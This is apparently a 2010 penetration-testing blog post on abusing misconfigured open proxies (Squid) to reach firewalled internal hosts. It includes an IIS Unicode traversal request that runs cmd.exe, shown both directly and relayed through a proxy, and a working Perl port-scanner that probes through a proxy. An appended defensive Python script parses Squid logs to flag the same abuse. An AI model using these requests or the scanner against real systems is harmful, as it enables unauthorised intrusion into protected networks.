Friday, October 22, 2010

Proxies (80,1080,3128,8080 TCP)

A proxy is used to relay HTTP and HTTPS connections - if you don't know what a proxy is you should not be reading any of this. If we find a proxy port open on a host it excites us, because a misconfigured proxy can be used to reach other webservers located behind a firewall. Just as your own proxy server lets you connect to it and surf sites on the outside, a victim's proxy server can serve as a gateway to machines that are normally not accessible. As an example: a firewall is protecting the 196.xxx.201.0/24 network. The intranet server is located on 196.xxx.201.10, but the firewall prohibits communication to port 80 (or 443). Port 3128 on 196.xxx.201.5 is open, and the Squid proxy there is not set up correctly (it allows anyone to connect to it). Change the proxy settings in your local browser to point to 196.xxx.201.5, browse to 196.xxx.201.10, and you reach the intranet server.
You can even run an exploit over a proxy. The only difference between reaching the machine directly and via a proxy is that the full URL needs to be sent, e.g.:
Without proxy (for example Unicode exploit):
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
With proxy:
GET http://target/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
You will need to make some changes to your exploit's code, but generally this is not difficult. Remember to point your exploit at the proxy address and port!
You could even use a proxy as a very primitive portscanner. By requesting a URL on a different port - say GET http://victim:port/ HTTP/1.0 - you may get a different response depending on whether the port is listening. Some proxies - such as Squid - do not even try to pass traffic with a destination port lower than 1024 (other than 70, 80 and 443). Traffic to ports higher than 1024 is allowed, so by interpreting the proxy's error responses we can tell whether a port is open or closed. Here is a simple Perl script that works OK with Squid:
---proxyscan.pl---
#!/usr/bin/perl
# proxyscan.pl - probe ports on scanIP through a Squid proxy by requesting
# http://scanIP:port/ and matching the text of the proxy's error page.
use Socket;
if ($#ARGV<0) {die "Usage: proxyscan.pl proxyIP:port:scanIP:beginrange:endrange\n";}
($host,$port,$scanIP,$br,$er)=split(/:/,$ARGV[0]);
print "Testing $scanIP via $host:$port:\n";
$target = inet_aton($host) || die("Cannot resolve $host\n");
for ($mp=$br; $mp <= $er; $mp++) {
    my @results=sendraw("GET http://$scanIP:$mp/ HTTP/1.0\r\n\r\n");
    #system "sleep 2";
    foreach $line (@results){
        # Squid answers "Connection refused" for a closed port and
        # "Zero Sized Reply" when the port accepted but sent nothing back
        if ($line =~ /refused/) {print "Port $mp on $scanIP is closed\n"}
        if ($line =~ /Zero/) {print "Port $mp on $scanIP is open\n"}
    }
}
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {
    my ($pstr)=@_;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
        die("Socket problems\n");
    if(connect(S,sockaddr_in($port,$target))){
        my @in;
        select(S); $|=1; print $pstr;
        while(<S>){ push @in, $_;}   # read the proxy's whole reply
        select(STDOUT); close(S); return @in;
    } else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata
> perl proxyscan.pl 160.124.19.103:3128:160.124.19.98:5999:6002
Testing 160.124.19.98 via 160.124.19.103:3128:
Port 5999 on 160.124.19.98 is closed
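Everything the script above does is relayed as an absolute-URL request, so it lands in the proxy's access.log. The following added example (not part of the original post or of SensePost's or Squid's code) parses constructed Squid native-format log lines and flags the three signs of the abuse described here: a client outside the network the proxy is meant to serve, requests for private-address destinations, and one client walking several ports on one host. The trusted client network and the sweep threshold are assumptions for the example.

```python
"""Flag Squid access.log entries matching the proxy-pivot and proxy-portscan
patterns from the post. Added example, not SensePost's or Squid's code."""
import ipaddress
from collections import defaultdict
from urllib.parse import urlsplit

# Assumption: the proxy is meant to serve only this client network.
TRUSTED_CLIENTS = [ipaddress.ip_network("192.168.1.0/24")]
SWEEP_THRESHOLD = 3  # distinct destination ports, one client -> one host

def parse_line(line):
    """Squid native format: time elapsed client status bytes method url ..."""
    f = line.split()
    if len(f) < 7:
        return None
    u = urlsplit(f[6])
    return {"client": f[2], "status": f[3], "host": u.hostname,
            "port": u.port or 80, "url": f[6]}

def analyse(lines):
    """Return (finding, client, detail) tuples for suspicious requests."""
    findings, ports_seen = [], defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["host"] is None:
            continue
        client = ipaddress.ip_address(rec["client"])
        if not any(client in net for net in TRUSTED_CLIENTS):
            findings.append(("untrusted-client", rec["client"], rec["url"]))
        try:  # a literal private address: the proxy is reaching the inside
            if ipaddress.ip_address(rec["host"]).is_private:
                findings.append(("internal-destination", rec["client"], rec["url"]))
        except ValueError:
            pass  # hostname rather than an address literal
        key = (rec["client"], rec["host"])
        ports_seen[key].add(rec["port"])
        if len(ports_seen[key]) == SWEEP_THRESHOLD:  # fire once per pair
            findings.append(("port-sweep", rec["client"], rec["host"]))
    return findings

# Constructed log lines (Squid native format); 503 = upstream refused.
SAMPLE_LOG = [
    "1287750000.101 12 203.0.113.7 TCP_MISS/503 0 GET http://10.0.0.10:5999/ - HIER_NONE/- -",
    "1287750001.202 10 203.0.113.7 TCP_MISS/503 0 GET http://10.0.0.10:6000/ - HIER_NONE/- -",
    "1287750002.303 9 203.0.113.7 TCP_MISS/200 312 GET http://10.0.0.10:6001/ - HIER_DIRECT/10.0.0.10 text/html",
    "1287750003.404 80 192.168.1.20 TCP_MISS/200 5120 GET http://example.com/ - HIER_DIRECT/203.0.113.80 text/html",
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG):
        print(*finding)
```

Run against the constructed sample, the trusted client's request to example.com produces nothing, while the external client's three requests to 10.0.0.10 produce an untrusted-client and internal-destination finding each plus one port-sweep finding.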
